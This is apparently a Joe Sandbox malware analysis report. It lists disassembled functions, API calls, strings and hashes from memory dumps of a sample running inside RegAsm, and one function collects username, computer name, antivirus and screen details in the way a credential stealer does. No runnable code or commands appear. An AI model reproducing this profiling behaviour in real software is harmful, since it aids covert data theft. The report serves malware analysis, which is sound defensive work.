API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 2a4d631158e51211e3147727f15cafd84e975047cc9865ec3b7b2eb9b461aa12
Instruction ID: b1bfa08c9efca6c835be882e5b3a0e1d9a60a5e05d490ae34c059ecd4a997381
Opcode Fuzzy Hash: 2a4d631158e51211e3147727f15cafd84e975047cc9865ec3b7b2eb9b461aa12
Instruction Fuzzy Hash: 2531B371B00289DBEF14EFB5CC58AAE77B9FB45708F134559F601A3A50EB70A904CB64

Function 0042660D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00426634
_free.LIBCMT ref: 00426642
_free.LIBCMT ref: 0042664D
_free.LIBCMT ref: 00426621

Part of subcall function 0041D93B: HeapFree.KERNEL32(00000000,00000000,?,0041D18F,00000000,0043B6F4,0041D1D6,0040EEBE,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4), ref: 0041D951
Part of subcall function 0041D93B: GetLastError.KERNEL32(?,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4,?,?,?), ref: 0041D963

___free_lc_time.LIBCMT ref: 0042666B
_free.LIBCMT ref: 00426676
_free.LIBCMT ref: 0042669B
_free.LIBCMT ref: 004266B2
_free.LIBCMT ref: 004266C1

Strings

xLC, xrefs: 0042665B

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lc_time
String ID: xLC
API String ID: 3704779436-381350105
Opcode ID: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
Instruction ID: fdfe39178027f3e5e6c57af64549801535ecf2e9aa55874642047572a4db4e51
Opcode Fuzzy Hash: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
Instruction Fuzzy Hash: 421194F2A10311ABDF206F76E985B9BB3A5EB01308F95093FE14897251CB3C9C91CA1C

Function 6C514480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C554843,?), ref: 6C5145F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C554843,?), ref: 6C51468A
free.MOZGLUE(?,?,?,?,?,?,6C554843,?), ref: 6C5146C9
free.MOZGLUE(?), ref: 6C5146EF
free.MOZGLUE(?), ref: 6C514712
free.MOZGLUE(?), ref: 6C514735
free.MOZGLUE(?), ref: 6C514758
free.MOZGLUE(?), ref: 6C51477B
free.MOZGLUE(?), ref: 6C51479E

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: da6b882f772e6dc9cf0a5925adf31df6ce61a048de4f8041a7d9854eed288311
Instruction ID: b52f9e0e37c779c29d78e3c61e55a1bb2e527dd2dc3185efdf341807924ab193
Opcode Fuzzy Hash: da6b882f772e6dc9cf0a5925adf31df6ce61a048de4f8041a7d9854eed288311
Instruction Fuzzy Hash: 3AB1E371A081508FEB18DE2CDC9876D77A2AF8132CF185A69E416DFFC6E7349C408B91

Function 6C57AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C57AC52
CreateFileMappingW.KERNEL32 ref: 6C57AC7D
GetSystemInfo.KERNEL32 ref: 6C57AC98
MapViewOfFile.KERNEL32 ref: 6C57ACB0
GetSystemInfo.KERNEL32 ref: 6C57ACCD
MapViewOfFile.KERNEL32 ref: 6C57AD05
UnmapViewOfFile.KERNEL32 ref: 6C57AD1C
CloseHandle.KERNEL32 ref: 6C57AD28
UnmapViewOfFile.KERNEL32 ref: 6C57AD37
CloseHandle.KERNEL32 ref: 6C57AD43
CloseHandle.KERNEL32 ref: 6C57AD67

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 5499a680599a2e91c50150d6461227c45008eda59470b76e9a9a28044811020e
Instruction ID: f05a2e61b411b982cb71d4e3712e39b46eeaf288366fb76bbb97f60ef273cd89
Opcode Fuzzy Hash: 5499a680599a2e91c50150d6461227c45008eda59470b76e9a9a28044811020e
Instruction Fuzzy Hash: 323180B1A04744CFEB10FF78CA4826EBBF4BF85305F02592DE88597201EB709488CB96

Function 0041B991 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,03C12578), ref: 0041B9C5
GetFileSize.KERNEL32(?,00000000), ref: 0041BA3E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BA5A
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BA6E
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BA77
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BA87
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BAA5
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BAB5

Strings

, xrefs: 0041BA11

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
Instruction ID: 2f96ef8e8c352da0c6fd23b8bc0b50d76e073618b9a0ce70252d9e73764e8c17
Opcode Fuzzy Hash: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
Instruction Fuzzy Hash: 4A51F3B1D0021CAFDB28DF99DC85AEEBBB9EF04344F10442AE511E6260D7789D85CF94

Function 6C576A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C59F618), ref: 6C576A68
GetCurrentProcess.KERNEL32 ref: 6C576A7D
GetCurrentProcess.KERNEL32 ref: 6C576AA1
EnterCriticalSection.KERNEL32(6C59F618), ref: 6C576AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C576AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C576B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C576B65
LeaveCriticalSection.KERNEL32(6C59F618,?,?), ref: 6C576B83

Strings

SymInitialize, xrefs: 6C576BA3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: 4e90821752e4af290301cc611e57e91393b07dc25acc6a8484765eb67fa4ff64
Instruction ID: 6321a1176a8b53ef854d880112a08e0f1db0b3e1e726cf81e4521997b3ae8afa
Opcode Fuzzy Hash: 4e90821752e4af290301cc611e57e91393b07dc25acc6a8484765eb67fa4ff64
Instruction Fuzzy Hash: 7C4182716053849FDF11DF74CC88B9A3BB8EB46304F0645B9F948CB282DBB19554CB66

Function 6C529620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C529675
__Init_thread_footer.LIBCMT ref: 6C529697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C5296E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C529707
__Init_thread_footer.LIBCMT ref: 6C52971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C529773

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C5297B7
FreeLibrary.KERNEL32 ref: 6C5297D0
FreeLibrary.KERNEL32 ref: 6C5297EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C529824

Strings

NtMapViewOfSection, xrefs: 6C529701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C529670
MapViewOfFileNuma2, xrefs: 6C5297B1
ntdll.dll, xrefs: 6C5296E3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: fd5f25524534959005f19bd3826b91349470317c3b8069bfffe8c25118ca35fa
Instruction ID: 4f5fa1fa7847630c4ba3e64a83e7e87b7ec913f10cff199940ddce3321d75221
Opcode Fuzzy Hash: fd5f25524534959005f19bd3826b91349470317c3b8069bfffe8c25118ca35fa
Instruction Fuzzy Hash: 8B41BF707002859BEF00DFA5DD84A9A77B4FB8A324F0742A8FD1697780D730A814CBA5

Function 6C560000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C560039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C560041
GetCurrentThreadId.KERNEL32 ref: 6C560075
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C560082
moz_xmalloc.MOZGLUE(00000048), ref: 6C560090
free.MOZGLUE(?), ref: 6C560104
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C56011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C56005B

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: 512ea03118a49fe3aee2995e744a55184716c08b642f0f5034de3d2838cf4a34
Instruction ID: a886e1e599fbdc433c004dcf67476e9b1b5b3369a39d9c52dd9da5eef7dbc734
Opcode Fuzzy Hash: 512ea03118a49fe3aee2995e744a55184716c08b642f0f5034de3d2838cf4a34
Instruction Fuzzy Hash: 31418DB1500284DFCB10DF65CC40A9ABBF1FF89318F42495AE99A83B50D731AC15CB99

Function 6C527E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C527EA7
malloc.MOZGLUE(00000001), ref: 6C527EB3

Part of subcall function 6C52CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C52CB49
Part of subcall function 6C52CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C52CBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C527EC4
mozalloc_abort.MOZGLUE(?), ref: 6C527F19
malloc.MOZGLUE(?), ref: 6C527F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C527F4D

Strings

d, xrefs: 6C527F89

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: a3012191779ba0005c452893dcf5e7f9dd645f4d761ffdb67507c74ddb0f9587
Instruction ID: 41497d167b46a0a9e66c2221b50ffc8fb6caeee0e4651dedce4bbc503c97a3dc
Opcode Fuzzy Hash: a3012191779ba0005c452893dcf5e7f9dd645f4d761ffdb67507c74ddb0f9587
Instruction Fuzzy Hash: 88312571E00399D7EB00DB78CC005FEB7B8EF96218F069269EC4957212FB30A988C394

Function 0040DB7F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,75B65460,?,00000000), ref: 0040DBBB
strchr.MSVCRT ref: 0040DBCD
strchr.MSVCRT ref: 0040DBF2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
strcpy_s.MSVCRT ref: 0040DC6F

Strings

0123456789ABCDEF, xrefs: 0040DB99

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 453150750-2554083253
Opcode ID: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
Instruction ID: be699800860e389eb7f033a368984428232de7924aec9246af203248711cb49e
Opcode Fuzzy Hash: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
Instruction Fuzzy Hash: 18315D71D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94

Function 0041F944 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 0041F969

Part of subcall function 0041F504: Replicator::operator[].LIBCMT ref: 0041F587
Part of subcall function 0041F504: DName::operator+=.LIBCMT ref: 0041F58F

DName::operator+.LIBCMT ref: 0041F9C2
DName::DName.LIBCMT ref: 0041FA1A

Strings

..., xrefs: 0041F9FD, 0041FA09
void, xrefs: 0041FA12
,..., xrefs: 0041F9AE, 0041F9BA
<ellipsis>, xrefs: 0041FA04
,<ellipsis>, xrefs: 0041F9B5

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction ID: a738addbbfcb5581dbeaf62b254c3fbf004fdb1dbbbb6a7a041229699445b56b
Opcode Fuzzy Hash: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction Fuzzy Hash: 3D217471611249AFCB21DF1CD444AA97BB4EF0534AB14806AE845CB367E738D987CB48

Function 004212DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 004212E7
DName::DName.LIBCMT ref: 004212F3

Part of subcall function 0041EFBE: DName::doPchar.LIBCMT ref: 0041EFEF

UnDecorator::getScopedName.LIBCMT ref: 00421332
DName::operator+=.LIBCMT ref: 0042133C
DName::operator+=.LIBCMT ref: 0042134B
DName::operator+=.LIBCMT ref: 00421357
DName::operator+=.LIBCMT ref: 00421364

Strings

void, xrefs: 00421343

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction ID: c2652f7c91e1ef5edc9e2e1e9b8a32b02dad70e76bfe1aa60437c31099f645d5
Opcode Fuzzy Hash: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction Fuzzy Hash: 75112C75600218BFD704EF68D855BEE7F64AF10309F44009FE416972E2DB38DA85C748

Function 00411563 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
ReleaseDC.USER32(00000000,00000000), ref: 00411596
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
wsprintfA.USER32 ref: 004115BB

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

%dx%d, xrefs: 004115B5

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: b27d7dd64cfe0a637a361d43d9ca9a290f2284dc2a72474dda508b1b2504b9a3
Instruction ID: 170008d2b248a6dac6df5cacbd3238be6a4bc1abd9d224a85ffebcf6f0d8f3fd
Opcode Fuzzy Hash: b27d7dd64cfe0a637a361d43d9ca9a290f2284dc2a72474dda508b1b2504b9a3
Instruction Fuzzy Hash: 59F0C832601320BBEB249BA59C0DD9B7EAEEF467A7F005451F605D2160E6B75E4087A0

Function 6C523E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C523EEE
RtlFreeHeap.NTDLL ref: 6C523FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C524006
RtlFreeHeap.NTDLL ref: 6C5240A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C523CCC), ref: 6C5240AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C523CCC), ref: 6C5240C2
RtlFreeHeap.NTDLL ref: 6C524134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C523CCC), ref: 6C524143
